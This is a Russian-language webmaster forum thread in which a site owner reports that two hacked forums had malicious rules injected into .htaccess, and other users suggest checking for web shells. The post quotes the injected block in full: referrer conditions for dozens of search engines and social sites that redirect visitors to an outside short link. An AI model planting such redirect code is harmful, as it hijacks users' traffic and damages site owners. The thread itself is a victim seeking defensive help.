Взломали сайты

69
На сайте с 29.02.2012
Offline
71
669
587

А точнее на двух форумах в файле .htaccess прописали такую шняшку:

RewriteCond %{HTTP_REFERER} .*google.* [OR]

RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
RewriteCond %{HTTP_REFERER} .*googlemail.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://0.ht/id1726 [R=301,L]

Перенаправление с поисковиков на сайт этого не хорошего человека :) Сейчас использую IPB 3.1.4, но думаю что не в ней дело, скорее всего троян. Может у кого нибудь было что то похожее, дайте совет.

sanhes
На сайте с 31.08.2008
Offline
81
#1

У меня джумлу ломают и также меняют код в .htaccess или в шаблон ифрейм вставляют. На других аккаунтах где нет джумлы, все нормально. На шеллы сайт проверяли?

Куплю вечные ссылки ЯК/Эротика.
69
На сайте с 29.02.2012
Offline
71
669
#2
sanhes:
На шеллы сайт проверяли?

Да собственно только начал, но это муторно очень(

sanhes
На сайте с 31.08.2008
Offline
81
#3
669:
Да собственно только начал, но это муторно очень(

Вот скрипт /ru/forum/707624.

69
На сайте с 29.02.2012
Offline
71
669
#4
sanhes:
Вот скрипт /ru/forum/707624.

Спасибо, попробую, а то через access_log напряжно

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий